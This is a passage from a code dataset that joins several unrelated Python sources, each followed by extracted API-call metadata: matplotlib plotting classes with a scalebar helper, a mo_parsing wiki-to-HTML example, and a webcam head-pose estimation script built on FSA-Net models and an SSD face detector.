self.metafig = MetaFigure(kind=self.kind, **kwargs)
self.fig = self.metafig.fig
self.axis = self.metafig.ax
else:
self.fig = self.axis.figure
# Attach plotter to its MetaFigure
self.metafig.plotters.append(self)
def loadData(self, fileName, fileDir=None, sim=None):
from ..analysis import loadData
self.data = loadData(fileName=fileName, fileDir=fileDir, sim=None)
def saveData(self, fileName=None, fileDesc=None, fileType=None, fileDir=None, sim=None, **kwargs):
from ..analysis import saveData as saveFigData
saveFigData(self.data, fileName=fileName, fileDesc=fileDesc, fileType=fileType, fileDir=fileDir, sim=sim, **kwargs)
def formatAxis(self, **kwargs):
if 'title' in kwargs:
self.axis.set_title(kwargs['title'])
if 'xlabel' in kwargs:
self.axis.set_xlabel(kwargs['xlabel'])
if 'ylabel' in kwargs:
self.axis.set_ylabel(kwargs['ylabel'])
if 'xlim' in kwargs:
if kwargs['xlim'] is not None:
self.axis.set_xlim(kwargs['xlim'])
if 'ylim' in kwargs:
if kwargs['ylim'] is not None:
self.axis.set_ylim(kwargs['ylim'])
if 'invert_yaxis' in kwargs:
if kwargs['invert_yaxis'] is True:
self.axis.invert_yaxis()
def addLegend(self, handles=None, labels=None, **kwargs):
legendParams = ['loc', 'bbox_to_anchor', 'fontsize', 'numpoints', 'scatterpoints', 'scatteryoffsets', 'markerscale', 'markerfirst', 'frameon', 'fancybox', 'shadow', 'framealpha', 'facecolor', 'edgecolor', 'mode', 'bbox_transform', 'title', 'title_fontsize', 'borderpad', 'labelspacing', 'handlelength', 'handletextpad', 'borderaxespad', 'columnspacing', 'handler_map']
# Check for and apply any legend parameters in the kwargs
legendKwargs = {}
for kwarg in kwargs:
if kwarg in legendParams:
legendKwargs[kwarg] = kwargs[kwarg]
# If 'legendKwargs' is found in kwargs, use those values instead of the defaults
if 'legendKwargs' in kwargs:
legendKwargs_new = kwargs['legendKwargs']
for key in legendKwargs_new:
if key in legendParams:
legendKwargs[key] = legendKwargs_new[key]
cur_handles, cur_labels = self.axis.get_legend_handles_labels()
if not handles:
handles = cur_handles
if not labels:
labels = cur_labels
self.axis.legend(handles, labels, **legendKwargs)
def addScalebar(self, matchx=True, matchy=True, hidex=True, hidey=True, unitsx=None, unitsy=None, scalex=1.0, scaley=1.0, xmax=None, ymax=None, space=None, **kwargs):
add_scalebar(self.axis, matchx=matchx, matchy=matchy, hidex=hidex, hidey=hidey, unitsx=unitsx, unitsy=unitsy, scalex=scalex, scaley=scaley, xmax=xmax, ymax=ymax, space=space, **kwargs)
def addColorbar(self, **kwargs):
plt.colorbar(mappable=self.axis.get_images()[0], ax=self.axis, **kwargs)
def finishAxis(self, **kwargs):
self.formatAxis(**kwargs)
if 'saveData' in kwargs:
if kwargs['saveData']:
self.saveData(**kwargs)
if 'dpi' in kwargs:
if kwargs['dpi']:
self.fig.set_dpi(kwargs['dpi'])
if 'figSize' in kwargs:
if kwargs['figSize']:
self.fig.set_size_inches(kwargs['figSize'])
if 'legend' in kwargs:
if kwargs['legend'] is True:
self.addLegend(**kwargs)
elif type(kwargs['legend']) == dict:
self.addLegend(**kwargs['legend'])
if 'scalebar' in kwargs:
if kwargs['scalebar'] is True:
self.addScalebar()
elif type(kwargs['scalebar']) == dict:
self.addScalebar(**kwargs['scalebar'])
if 'colorbar' in kwargs:
if kwargs['colorbar'] is True:
self.addColorbar()
elif type(kwargs['colorbar']) == dict:
self.addColorbar(**kwargs['colorbar'])
if 'grid' in kwargs:
self.axis.minorticks_on()
if kwargs['grid'] is True:
self.axis.grid()
elif type(kwargs['grid']) == dict:
self.axis.grid(**kwargs['grid'])
# If this is the only axis on the figure, finish the figure
if type(self.metafig.ax) != list:
self.metafig.finishFig(**kwargs)
# Reset the matplotlib rcParams to their original settings
mpl.style.use(self.metafig.orig_rcParams)
class ScatterPlotter(GeneralPlotter):
"""A class used for scatter plotting"""
def __init__(self, data, axis=None, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.kind = 'scatter'
self.x = data.get('x')
self.y = data.get('y')
self.s = data.get('s')
self.c = data.get('c')
self.marker = data.get('marker')
self.linewidth = data.get('linewidth')
self.cmap = data.get('cmap')
self.norm = data.get('norm')
self.alpha = data.get('alpha')
self.linewidths = data.get('linewidths')
def plot(self, **kwargs):
scatterPlot = self.axis.scatter(x=self.x, y=self.y, s=self.s, c=self.c, marker=self.marker, linewidth=self.linewidth, cmap=self.cmap, norm=self.norm, alpha=self.alpha, linewidths=self.linewidths)
self.finishAxis(**kwargs)
return self.fig
class LinePlotter(GeneralPlotter):
"""A class used for plotting one line per subplot"""
def __init__(self, data, axis=None, options={}, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.kind = 'line'
self.x = np.array(data.get('x'))
self.y = np.array(data.get('y'))
self.color = data.get('color')
self.marker = data.get('marker')
self.markersize = data.get('markersize')
self.linewidth = data.get('linewidth')
self.alpha = data.get('alpha')
def plot(self, **kwargs):
linePlot = self.axis.plot(self.x, self.y, color=self.color, marker=self.marker, markersize=self.markersize, linewidth=self.linewidth, alpha=self.alpha)
self.finishAxis(**kwargs)
return self.fig
class LinesPlotter(GeneralPlotter):
"""A class used for plotting multiple lines on the same axis"""
def __init__(self, data, axis=None, options={}, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.kind = 'lines'
self.x = np.array(data.get('x'))
self.y = np.array(data.get('y'))
self.color = data.get('color')
self.marker = data.get('marker')
self.markersize = data.get('markersize')
self.linewidth = data.get('linewidth')
self.alpha = data.get('alpha')
self.label = data.get('label')
def plot(self, **kwargs):
numLines = len(self.y)
if type(self.color) != list:
colors = [self.color for line in range(numLines)]
else:
colors = self.color
if type(self.marker) != list:
markers = [self.marker for line in range(numLines)]
else:
markers = self.marker
if type(self.markersize) != list:
markersizes = [self.markersize for line in range(numLines)]
else:
markersizes = self.markersize
if type(self.linewidth) != list:
linewidths = [self.linewidth for line in range(numLines)]
else:
linewidths = self.linewidth
if type(self.alpha) != list:
alphas = [self.alpha for line in range(numLines)]
else:
alphas = self.alpha
if self.label is None:
labels = [None for line in range(numLines)]
else:
labels = self.label
for index, line in enumerate(self.y):
self.axis.plot(
self.x,
self.y[index],
color=colors[index],
marker=markers[index],
markersize=markersizes[index],
linewidth=linewidths[index],
alpha=alphas[index],
label=labels[index],
)
self.finishAxis(**kwargs)
return self.fig
class HistPlotter(GeneralPlotter):
"""A class used for histogram plotting"""
def __init__(self, data, axis=None, options={}, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.kind = 'histogram'
self.x = data.get('x')
self.bins = data.get('bins', None)
self.range = data.get('range', None)
self.density = data.get('density', False)
self.weights = data.get('weights', None)
self.cumulative = data.get('cumulative', False)
self.bottom = data.get('bottom', None)
self.histtype = data.get('histtype', 'bar')
self.align = data.get('align', 'mid')
self.orientation = data.get('orientation', 'vertical')
self.rwidth = data.get('rwidth', None)
self.log = data.get('log', False)
self.color = data.get('color', None)
self.alpha = data.get('alpha', None)
self.label = data.get('label', None)
self.stacked = data.get('stacked', False)
self.data = data.get('data', None)
def plot(self, **kwargs):
histPlot = self.axis.hist(self.x, bins=self.bins, range=self.range, density=self.density, weights=self.weights, cumulative=self.cumulative, bottom=self.bottom, histtype=self.histtype, align=self.align, orientation=self.orientation, rwidth=self.rwidth, log=self.log, color=self.color, alpha=self.alpha, label=self.label, stacked=self.stacked, data=self.data)
self.finishAxis(**kwargs)
return self.fig
class ImagePlotter(GeneralPlotter):
"""A class used for image plotting using plt.imshow"""
def __init__(self, data, axis=None, options={}, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.kind = 'image'
self.X = data.get('X')
self.cmap = data.get('cmap', None)
self.norm = data.get('norm', None)
self.aspect = data.get('aspect', None)
self.interpolation = data.get('interpolation', None)
self.alpha = data.get('alpha', None)
self.vmin = data.get('vmin', None)
self.vmax = data.get('vmax', None)
self.origin = data.get('origin', None)
self.extent = data.get('extent', None)
self.aspect = data.get('aspect', None)
self.interpolation = data.get('interpolation', None)
self.filternorm = data.get('filternorm', True)
self.filterrad = data.get('filterrad', 4.0)
self.resample = data.get('resample', None)
self.url = data.get('url', None)
self.data = data.get('data', None)
def plot(self, **kwargs):
imagePlot = self.axis.imshow(self.X, cmap=self.cmap, norm=self.norm, aspect=self.aspect, interpolation=self.interpolation, alpha=self.alpha, vmin=self.vmin, vmax=self.vmax, origin=self.origin, extent=self.extent, filternorm=self.filternorm, filterrad=self.filterrad, resample=self.resample, url=self.url, data=self.data)
self.finishAxis(**kwargs)
return self.fig
class AnchoredScaleBar(AnchoredOffsetbox):
"""
A class used for adding scale bars to plots
"""
def __init__(self, axis, sizex=0, sizey=0, labelx=None, labely=None, loc=4, pad=0.1, borderpad=0.1, sep=2, prop=None, barcolor="black", barwidth=None, **kwargs):
"""
Draw a horizontal and/or vertical bar with the size in data coordinate
of the give axes. A label will be drawn underneath (center-aligned).
- transform : the coordinate frame (typically axes.transData)
- sizex,sizey : width of x,y bar, in data units. 0 to omit
- labelx,labely : labels for x,y bars; None to omit
- loc : position in containing axes
- pad, borderpad : padding, in fraction of the legend font size (or prop)
- sep : separation between labels and bars in points.
- **kwargs : additional arguments passed to base class constructor
"""
from matplotlib.patches import Rectangle
from matplotlib.offsetbox import AuxTransformBox, VPacker, HPacker, TextArea, DrawingArea
bars = AuxTransformBox(axis.transData)
if sizex:
if axis.xaxis_inverted():
sizex = -sizex
bars.add_artist(Rectangle((0,0), sizex, 0, ec=barcolor, lw=barwidth, fc="none"))
if sizey:
if axis.yaxis_inverted():
sizey = -sizey
bars.add_artist(Rectangle((0,0), 0, sizey, ec=barcolor, lw=barwidth, fc="none"))
if sizex and labelx:
self.xlabel = TextArea(labelx)
bars = VPacker(children=[bars, self.xlabel], align="center", pad=0, sep=sep)
if sizey and labely:
self.ylabel = TextArea(labely)
bars = HPacker(children=[self.ylabel, bars], align="center", pad=0, sep=sep)
AnchoredOffsetbox.__init__(self, loc, pad=pad, borderpad=borderpad, child=bars, prop=prop, frameon=False, **kwargs)
def add_scalebar(axis, matchx=True, matchy=True, hidex=True, hidey=True, unitsx=None, unitsy=None, scalex=1.0, scaley=1.0, xmax=None, ymax=None, space=None, **kwargs):
"""
Add scalebars to axes
Adds a set of scale bars to *ax*, matching the size to the ticks of the plot and optionally hiding the x and y axes
- axis : the axis to attach ticks to
- matchx,matchy : if True, set size of scale bars to spacing between ticks, if False, set size using sizex and sizey params
- hidex,hidey : if True, hide x-axis and y-axis of parent
- **kwargs : additional arguments passed to AnchoredScaleBars
Returns created scalebar object
"""
def get_tick_size(subaxis):
tick_size = None
tick_locs = subaxis.get_majorticklocs()
if len(tick_locs)>1:
tick_size = np.abs(tick_locs[1] - tick_locs[0])
return tick_size
if matchx:
sizex = get_tick_size(axis.xaxis)
if matchy:
sizey = get_tick_size(axis.yaxis)
if 'sizex' in kwargs:
sizex = kwargs['sizex']
if 'sizey' in kwargs:
sizey = kwargs['sizey']
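    # Shrink an oversized scalebar length to fit below maxvalue, rounding it to a readable value.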
def autosize(value, maxvalue, scale, n=1, m=10):
round_to_n = lambda value, n, m: int(np.ceil(round(value, -int(np.floor(np.log10(abs(value)))) + (n - 1)) / m)) * m
while value > maxvalue:
try:
value = round_to_n(0.8 * maxvalue * scale, n, m) / scale
except:
value /= 10.0
m /= 10.0
return value
if ymax is not None and sizey>ymax:
sizey = autosize(sizey, ymax, scaley)
if xmax is not None and sizex>xmax:
sizex = autosize(sizex, xmax, scalex)
kwargs['sizex'] = sizex
kwargs['sizey'] = sizey
if unitsx is None:
unitsx = ''
if unitsy is None:
unitsy = ''
if 'labelx' not in kwargs or kwargs['labelx'] is None:
kwargs['labelx'] = '%.3g %s'%(kwargs['sizex'] * scalex, unitsx)
if 'labely' not in kwargs or kwargs['labely'] is None:
kwargs['labely'] = '%.3g %s'%(kwargs['sizey'] * scaley, unitsy)
# add space for scalebar
if space is not None:
ylim0, ylim1 = axis.get_ylim()
ylim = (ylim0 - space, ylim1)
if ylim0 > ylim1: # if y axis is inverted
ylim = (ylim0 + space, ylim1)
axis.set_ylim(ylim)
scalebar = AnchoredScaleBar(axis, **kwargs)
axis.add_artist(scalebar)
if hidex:
axis.xaxis.set_visible(False)
if hidey:
axis.yaxis.set_visible(False)
if hidex and hidey:
axis.set_frame_on(False)
return scalebar
| [
"numpy.abs",
"matplotlib.offsetbox.VPacker",
"matplotlib.patches.Rectangle",
"matplotlib.offsetbox.AuxTransformBox",
"os.path.join",
"numpy.max",
"os.path.isfile",
"matplotlib.pyplot.close",
"matplotlib.offsetbox.TextArea",
"matplotlib.offsetbox.AnchoredOffsetbox.__init__",
"matplotlib.style.use",
"matplotlib.offsetbox.HPacker",
"matplotlib.pyplot.tight_layout",
"copy.deepcopy",
"matplotlib.pyplot.subplots"
]
| [((970, 999), 'copy.deepcopy', 'deepcopy', (['mpl.rcParamsDefault'], {}), '(mpl.rcParamsDefault)\n', (978, 999), False, 'from copy import deepcopy\n'), ((2219, 2271), 'matplotlib.pyplot.subplots', 'plt.subplots', (['nrows', 'ncols'], {'figsize': 'figSize', 'dpi': 'dpi'}), '(nrows, ncols, figsize=figSize, dpi=dpi)\n', (2231, 2271), True, 'import matplotlib.pyplot as plt\n'), ((5283, 5316), 'matplotlib.style.use', 'mpl.style.use', (['self.orig_rcParams'], {}), '(self.orig_rcParams)\n', (5296, 5316), True, 'import matplotlib as mpl\n'), ((11099, 11140), 'matplotlib.style.use', 'mpl.style.use', (['self.metafig.orig_rcParams'], {}), '(self.metafig.orig_rcParams)\n', (11112, 11140), True, 'import matplotlib as mpl\n'), ((19358, 19389), 'matplotlib.offsetbox.AuxTransformBox', 'AuxTransformBox', (['axis.transData'], {}), '(axis.transData)\n', (19373, 19389), False, 'from matplotlib.offsetbox import AuxTransformBox, VPacker, HPacker, TextArea, DrawingArea\n'), ((20082, 20202), 'matplotlib.offsetbox.AnchoredOffsetbox.__init__', 'AnchoredOffsetbox.__init__', (['self', 'loc'], {'pad': 'pad', 'borderpad': 'borderpad', 'child': 'bars', 'prop': 'prop', 'frameon': '(False)'}), '(self, loc, pad=pad, borderpad=borderpad, child=\n bars, prop=prop, frameon=False, **kwargs)\n', (20108, 20202), False, 'from matplotlib.offsetbox import AnchoredOffsetbox\n'), ((1982, 2004), 'numpy.max', 'np.max', (['[nrows, ncols]'], {}), '([nrows, ncols])\n', (1988, 2004), True, 'import numpy as np\n'), ((3749, 3780), 'os.path.join', 'os.path.join', (['fileDir', 'fileName'], {}), '(fileDir, fileName)\n', (3761, 3780), False, 'import os\n'), ((3826, 3850), 'os.path.isfile', 'os.path.isfile', (['fileName'], {}), '(fileName)\n', (3840, 3850), False, 'import os\n'), ((4852, 4870), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (4868, 4870), True, 'import matplotlib.pyplot as plt\n'), ((5187, 5206), 'matplotlib.pyplot.close', 'plt.close', (['self.fig'], {}), '(self.fig)\n', (5196, 5206), True, 'import matplotlib.pyplot as plt\n'), ((5885, 5905), 'os.path.isfile', 'os.path.isfile', (['data'], {}), '(data)\n', (5899, 5905), False, 'import os\n'), ((19806, 19822), 'matplotlib.offsetbox.TextArea', 'TextArea', (['labelx'], {}), '(labelx)\n', (19814, 19822), False, 'from matplotlib.offsetbox import AuxTransformBox, VPacker, HPacker, TextArea, DrawingArea\n'), ((19842, 19911), 'matplotlib.offsetbox.VPacker', 'VPacker', ([], {'children': '[bars, self.xlabel]', 'align': '"""center"""', 'pad': '(0)', 'sep': 'sep'}), "(children=[bars, self.xlabel], align='center', pad=0, sep=sep)\n", (19849, 19911), False, 'from matplotlib.offsetbox import AuxTransformBox, VPacker, HPacker, TextArea, DrawingArea\n'), ((19967, 19983), 'matplotlib.offsetbox.TextArea', 'TextArea', (['labely'], {}), '(labely)\n', (19975, 19983), False, 'from matplotlib.offsetbox import AuxTransformBox, VPacker, HPacker, TextArea, DrawingArea\n'), ((20003, 20072), 'matplotlib.offsetbox.HPacker', 'HPacker', ([], {'children': '[self.ylabel, bars]', 'align': '"""center"""', 'pad': '(0)', 'sep': 'sep'}), "(children=[self.ylabel, bars], align='center', pad=0, sep=sep)\n", (20010, 20072), False, 'from matplotlib.offsetbox import AuxTransformBox, VPacker, HPacker, TextArea, DrawingArea\n'), ((21024, 21059), 'numpy.abs', 'np.abs', (['(tick_locs[1] - tick_locs[0])'], {}), '(tick_locs[1] - tick_locs[0])\n', (21030, 21059), True, 'import numpy as np\n'), ((4919, 4937), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (4935, 4937), True, 'import 
matplotlib.pyplot as plt\n'), ((19505, 19569), 'matplotlib.patches.Rectangle', 'Rectangle', (['(0, 0)', 'sizex', '(0)'], {'ec': 'barcolor', 'lw': 'barwidth', 'fc': '"""none"""'}), "((0, 0), sizex, 0, ec=barcolor, lw=barwidth, fc='none')\n", (19514, 19569), False, 'from matplotlib.patches import Rectangle\n'), ((19685, 19749), 'matplotlib.patches.Rectangle', 'Rectangle', (['(0, 0)', '(0)', 'sizey'], {'ec': 'barcolor', 'lw': 'barwidth', 'fc': '"""none"""'}), "((0, 0), 0, sizey, ec=barcolor, lw=barwidth, fc='none')\n", (19694, 19749), False, 'from matplotlib.patches import Rectangle\n')] |
from mo_parsing.helpers import QuotedString
wikiInput = """
Here is a simple Wiki input:
*This is in italics.*
**This is in bold!**
***This is in bold italics!***
Here's a URL to {{Pyparsing's Wiki Page->https://site-closed.wikispaces.com}}
"""
def convertToHTML(opening, closing):
def conversionParseAction(t, l, s):
return opening + t[0] + closing
return conversionParseAction
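# Parse actions that wrap *italic*, **bold**, and ***bold italic*** spans in the matching HTML tags.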
italicized = QuotedString("*").add_parse_action(convertToHTML("<I>", "</I>"))
bolded = QuotedString("**").add_parse_action(convertToHTML("<B>", "</B>"))
boldItalicized = QuotedString("***").add_parse_action(convertToHTML("<B><I>", "</I></B>"))
def convertToHTML_A(t, l, s):
try:
text, url = t[0].split("->")
except ValueError:
raise ParseFatalException(s, l, "invalid URL link reference: " + t[0])
return '<A href="{}">{}</A>'.format(url, text)
urlRef = QuotedString("{{", end_quote_char="}}").add_parse_action(convertToHTML_A)
wikiMarkup = urlRef | boldItalicized | bolded | italicized
| [
"mo_parsing.helpers.QuotedString"
]
| [((440, 457), 'mo_parsing.helpers.QuotedString', 'QuotedString', (['"""*"""'], {}), "('*')\n", (452, 457), False, 'from mo_parsing.helpers import QuotedString\n'), ((515, 533), 'mo_parsing.helpers.QuotedString', 'QuotedString', (['"""**"""'], {}), "('**')\n", (527, 533), False, 'from mo_parsing.helpers import QuotedString\n'), ((599, 618), 'mo_parsing.helpers.QuotedString', 'QuotedString', (['"""***"""'], {}), "('***')\n", (611, 618), False, 'from mo_parsing.helpers import QuotedString\n'), ((926, 965), 'mo_parsing.helpers.QuotedString', 'QuotedString', (['"""{{"""'], {'end_quote_char': '"""}}"""'}), "('{{', end_quote_char='}}')\n", (938, 965), False, 'from mo_parsing.helpers import QuotedString\n')] |
import os
import time
import cv2
import sys
sys.path.append('..')
import numpy as np
from math import cos, sin
from lib.FSANET_model import *
import numpy as np
from keras.layers import Average
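# Draw the estimated yaw/pitch/roll as three coloured axes centred on the face.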
def draw_axis(img, yaw, pitch, roll, tdx=None, tdy=None, size = 50):
print(yaw,roll,pitch)
pitch = pitch * np.pi / 180
yaw = -(yaw * np.pi / 180)
roll = roll * np.pi / 180
if tdx != None and tdy != None:
tdx = tdx
tdy = tdy
else:
height, width = img.shape[:2]
tdx = width / 2
tdy = height / 2
# X-Axis pointing to right. drawn in red
x1 = size * (cos(yaw) * cos(roll)) + tdx
y1 = size * (cos(pitch) * sin(roll) + cos(roll) * sin(pitch) * sin(yaw)) + tdy
# Y-Axis | drawn in green
# v
x2 = size * (-cos(yaw) * sin(roll)) + tdx
y2 = size * (cos(pitch) * cos(roll) - sin(pitch) * sin(yaw) * sin(roll)) + tdy
# Z-Axis (out of the screen) drawn in blue
x3 = size * (sin(yaw)) + tdx
y3 = size * (-cos(yaw) * sin(pitch)) + tdy
cv2.line(img, (int(tdx), int(tdy)), (int(x1),int(y1)),(0,0,255),3)
cv2.line(img, (int(tdx), int(tdy)), (int(x2),int(y2)),(0,255,0),3)
cv2.line(img, (int(tdx), int(tdy)), (int(x3),int(y3)),(255,0,0),2)
return img
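# Crop each SSD face detection above the confidence threshold, run it through the pose model, and draw the predicted axes on the frame.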
def draw_results_ssd(detected,input_img,faces,ad,img_size,img_w,img_h,model):
# loop over the detections
if detected.shape[2]>0:
for i in range(0, detected.shape[2]):
# extract the confidence (i.e., probability) associated with the
# prediction
confidence = detected[0, 0, i, 2]
# filter out weak detections
if confidence > 0.5:
# compute the (x, y)-coordinates of the bounding box for
# the face and extract the face ROI
(h0, w0) = input_img.shape[:2]
box = detected[0, 0, i, 3:7] * np.array([w0, h0, w0, h0])
(startX, startY, endX, endY) = box.astype("int")
# print((startX, startY, endX, endY))
x1 = startX
y1 = startY
w = endX - startX
h = endY - startY
x2 = x1+w
y2 = y1+h
xw1 = max(int(x1 - ad * w), 0)
yw1 = max(int(y1 - ad * h), 0)
xw2 = min(int(x2 + ad * w), img_w - 1)
yw2 = min(int(y2 + ad * h), img_h - 1)
cv2.rectangle(input_img, (xw1,yw1), (xw2,yw2), (0, 0, 255), 2)
start=time.time()
faces[i,:,:,:] = cv2.resize(input_img[yw1:yw2 + 1, xw1:xw2 + 1, :], (img_size, img_size))
faces[i,:,:,:] = cv2.normalize(faces[i,:,:,:], None, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX)
face = np.expand_dims(faces[i,:,:,:], axis=0)
p_result = model.predict(face)
                print('direction', time.time()-start)
face = face.squeeze()
img = draw_axis(input_img[yw1:yw2 + 1, xw1:xw2 + 1, :], p_result[0][0], p_result[0][1], p_result[0][2])
input_img[yw1:yw2 + 1, xw1:xw2 + 1, :] = img
return input_img
def main():
os.makedirs('./img',exist_ok=True)
img_size = 64
img_idx = 0
ad = 0.6
#Parameters
num_capsule = 3
dim_capsule = 16
routings = 2
stage_num = [3,3,3]
lambda_d = 1
num_classes = 3
image_size = 64
num_primcaps = 7*3
m_dim = 5
S_set = [num_capsule, dim_capsule, routings, num_primcaps, m_dim]
model1 = FSA_net_Capsule(image_size, num_classes, stage_num, lambda_d, S_set)()
model2 = FSA_net_Var_Capsule(image_size, num_classes, stage_num, lambda_d, S_set)()
num_primcaps = 8*8*3
S_set = [num_capsule, dim_capsule, routings, num_primcaps, m_dim]
model3 = FSA_net_noS_Capsule(image_size, num_classes, stage_num, lambda_d, S_set)()
weight_file1 = '../pre-trained/300W_LP_models/fsanet_capsule_3_16_2_21_5/fsanet_capsule_3_16_2_21_5.h5'
model1.load_weights(weight_file1)
print('Finished loading model 1.')
weight_file2 = '../pre-trained/300W_LP_models/fsanet_var_capsule_3_16_2_21_5/fsanet_var_capsule_3_16_2_21_5.h5'
weight_file3 = '../pre-trained/300W_LP_models/fsanet_noS_capsule_3_16_2_192_5/fsanet_noS_capsule_3_16_2_192_5.h5'
model2.load_weights(weight_file2)
print('Finished loading model 2.')
model3.load_weights(weight_file3)
print('Finished loading model 3.')
inputs = Input(shape=(64,64,3))
x1 = model1(inputs) #1x1
x2 = model2(inputs) #var
x3 = model3(inputs) #w/o
avg_model = Average()([x1,x2,x3])
model = Model(inputs=inputs, outputs=avg_model)
# load our serialized face detector from disk
print("[INFO] loading face detector...")
protoPath = os.path.sep.join(["face_detector", "deploy.prototxt"])
modelPath = os.path.sep.join(["face_detector",
"res10_300x300_ssd_iter_140000.caffemodel"])
net = cv2.dnn.readNetFromCaffe(protoPath, modelPath)
# capture video
cap = cv2.VideoCapture(0)
# cap.set(cv2.CAP_PROP_FRAME_WIDTH, 1024*1)
# cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 768*1)
while True:
# get video frame
ret, input_img = cap.read()
img_idx = img_idx + 1
img_h, img_w, _ = np.shape(input_img)
blob = cv2.dnn.blobFromImage(cv2.resize(input_img, (300, 300)), 1.0,
(300, 300), (104.0, 177.0, 123.0))
net.setInput(blob)
detected = net.forward()
faces = np.empty((detected.shape[2], img_size, img_size, 3))
input_img = draw_results_ssd(detected,input_img,faces,ad,img_size,img_w,img_h,model)
# cv2.imwrite('img/'+str(img_idx)+'.png',input_img)
cv2.imshow("result", input_img)
key = cv2.waitKey(1)
if __name__ == '__main__':
main()
| [
"cv2.rectangle",
"cv2.resize",
"os.makedirs",
"cv2.normalize",
"cv2.dnn.readNetFromCaffe",
"cv2.imshow",
"math.cos",
"numpy.array",
"os.path.sep.join",
"cv2.waitKey",
"numpy.empty",
"cv2.VideoCapture",
"numpy.expand_dims",
"time.time",
"numpy.shape",
"math.sin",
"sys.path.append",
"keras.layers.Average"
]
| [((45, 66), 'sys.path.append', 'sys.path.append', (['""".."""'], {}), "('..')\n", (60, 66), False, 'import sys\n'), ((3243, 3278), 'os.makedirs', 'os.makedirs', (['"""./img"""'], {'exist_ok': '(True)'}), "('./img', exist_ok=True)\n", (3254, 3278), False, 'import os\n'), ((4861, 4915), 'os.path.sep.join', 'os.path.sep.join', (["['face_detector', 'deploy.prototxt']"], {}), "(['face_detector', 'deploy.prototxt'])\n", (4877, 4915), False, 'import os\n'), ((4932, 5011), 'os.path.sep.join', 'os.path.sep.join', (["['face_detector', 'res10_300x300_ssd_iter_140000.caffemodel']"], {}), "(['face_detector', 'res10_300x300_ssd_iter_140000.caffemodel'])\n", (4948, 5011), False, 'import os\n'), ((5030, 5076), 'cv2.dnn.readNetFromCaffe', 'cv2.dnn.readNetFromCaffe', (['protoPath', 'modelPath'], {}), '(protoPath, modelPath)\n', (5054, 5076), False, 'import cv2\n'), ((5108, 5127), 'cv2.VideoCapture', 'cv2.VideoCapture', (['(0)'], {}), '(0)\n', (5124, 5127), False, 'import cv2\n'), ((4675, 4684), 'keras.layers.Average', 'Average', ([], {}), '()\n', (4682, 4684), False, 'from keras.layers import Average\n'), ((5360, 5379), 'numpy.shape', 'np.shape', (['input_img'], {}), '(input_img)\n', (5368, 5379), True, 'import numpy as np\n'), ((5582, 5634), 'numpy.empty', 'np.empty', (['(detected.shape[2], img_size, img_size, 3)'], {}), '((detected.shape[2], img_size, img_size, 3))\n', (5590, 5634), True, 'import numpy as np\n'), ((5802, 5833), 'cv2.imshow', 'cv2.imshow', (['"""result"""', 'input_img'], {}), "('result', input_img)\n", (5812, 5833), False, 'import cv2\n'), ((5848, 5862), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (5859, 5862), False, 'import cv2\n'), ((970, 978), 'math.sin', 'sin', (['yaw'], {}), '(yaw)\n', (973, 978), False, 'from math import cos, sin\n'), ((5418, 5451), 'cv2.resize', 'cv2.resize', (['input_img', '(300, 300)'], {}), '(input_img, (300, 300))\n', (5428, 5451), False, 'import cv2\n'), ((619, 627), 'math.cos', 'cos', (['yaw'], {}), '(yaw)\n', (622, 627), False, 'from math import cos, sin\n'), ((630, 639), 'math.cos', 'cos', (['roll'], {}), '(roll)\n', (633, 639), False, 'from math import cos, sin\n'), ((805, 814), 'math.sin', 'sin', (['roll'], {}), '(roll)\n', (808, 814), False, 'from math import cos, sin\n'), ((1015, 1025), 'math.sin', 'sin', (['pitch'], {}), '(pitch)\n', (1018, 1025), False, 'from math import cos, sin\n'), ((2459, 2523), 'cv2.rectangle', 'cv2.rectangle', (['input_img', '(xw1, yw1)', '(xw2, yw2)', '(0, 0, 255)', '(2)'], {}), '(input_img, (xw1, yw1), (xw2, yw2), (0, 0, 255), 2)\n', (2472, 2523), False, 'import cv2\n'), ((2544, 2555), 'time.time', 'time.time', ([], {}), '()\n', (2553, 2555), False, 'import time\n'), ((2589, 2661), 'cv2.resize', 'cv2.resize', (['input_img[yw1:yw2 + 1, xw1:xw2 + 1, :]', '(img_size, img_size)'], {}), '(input_img[yw1:yw2 + 1, xw1:xw2 + 1, :], (img_size, img_size))\n', (2599, 2661), False, 'import cv2\n'), ((2695, 2784), 'cv2.normalize', 'cv2.normalize', (['faces[i, :, :, :]', 'None'], {'alpha': '(0)', 'beta': '(255)', 'norm_type': 'cv2.NORM_MINMAX'}), '(faces[i, :, :, :], None, alpha=0, beta=255, norm_type=cv2.\n NORM_MINMAX)\n', (2708, 2784), False, 'import cv2\n'), ((2825, 2866), 'numpy.expand_dims', 'np.expand_dims', (['faces[i, :, :, :]'], {'axis': '(0)'}), '(faces[i, :, :, :], axis=0)\n', (2839, 2866), True, 'import numpy as np\n'), ((664, 674), 'math.cos', 'cos', (['pitch'], {}), '(pitch)\n', (667, 674), False, 'from math import cos, sin\n'), ((677, 686), 'math.sin', 'sin', (['roll'], {}), '(roll)\n', (680, 686), False, 'from 
math import cos, sin\n'), ((714, 722), 'math.sin', 'sin', (['yaw'], {}), '(yaw)\n', (717, 722), False, 'from math import cos, sin\n'), ((794, 802), 'math.cos', 'cos', (['yaw'], {}), '(yaw)\n', (797, 802), False, 'from math import cos, sin\n'), ((839, 849), 'math.cos', 'cos', (['pitch'], {}), '(pitch)\n', (842, 849), False, 'from math import cos, sin\n'), ((852, 861), 'math.cos', 'cos', (['roll'], {}), '(roll)\n', (855, 861), False, 'from math import cos, sin\n'), ((888, 897), 'math.sin', 'sin', (['roll'], {}), '(roll)\n', (891, 897), False, 'from math import cos, sin\n'), ((1004, 1012), 'math.cos', 'cos', (['yaw'], {}), '(yaw)\n', (1007, 1012), False, 'from math import cos, sin\n'), ((1898, 1924), 'numpy.array', 'np.array', (['[w0, h0, w0, h0]'], {}), '([w0, h0, w0, h0])\n', (1906, 1924), True, 'import numpy as np\n'), ((689, 698), 'math.cos', 'cos', (['roll'], {}), '(roll)\n', (692, 698), False, 'from math import cos, sin\n'), ((701, 711), 'math.sin', 'sin', 